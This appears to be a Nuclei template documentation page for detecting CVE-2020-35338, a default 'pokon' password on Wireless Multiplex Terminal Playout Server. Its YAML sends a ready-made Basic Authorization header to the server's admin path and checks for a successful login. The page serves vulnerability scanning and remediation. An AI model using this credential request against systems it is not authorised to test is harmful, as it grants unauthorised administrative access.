Skip to content
Nuclei Templates

Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection

ID: CVE-2020-35338

Severity: critical

Author: Jeya Seelan

Tags: cve,cve2020,wmt,default-login,mobileviewpoint

Description

Section titled “Description”

Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface.

YAML Source

Section titled “YAML Source”
id: CVE-2020-35338


info:
  name: Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection
  author: Jeya Seelan
  severity: critical
  description: Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to the server.
  remediation: |
    Change the default credentials to strong and unique ones.
  reference:
    - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35338
    - https://www.mobileviewpoint.com/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-35338
    cwe-id: CWE-798
    epss-score: 0.2493
    epss-percentile: 0.96665
    cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mobileviewpoint
    product: wireless_multiplex_terminal_playout_server
  tags: cve,cve2020,wmt,default-login,mobileviewpoint


http:
  - method: GET
    path:
      - "{{BaseURL}}/server/"


    headers:
      Authorization: "Basic OnBva29u"


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<title>WMT Server playout"


      - type: status
        status:
          - 200
# digest: 490a00463044022050c14cf5319609a1cb84d77855bc21a73d9e39cf4bcd3121ea4e4d8891127e7602200dd84542e38c1272d2dae672bad137d0b71dac860dedec7ff38d4999585805a3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-35338.yaml"

View on Github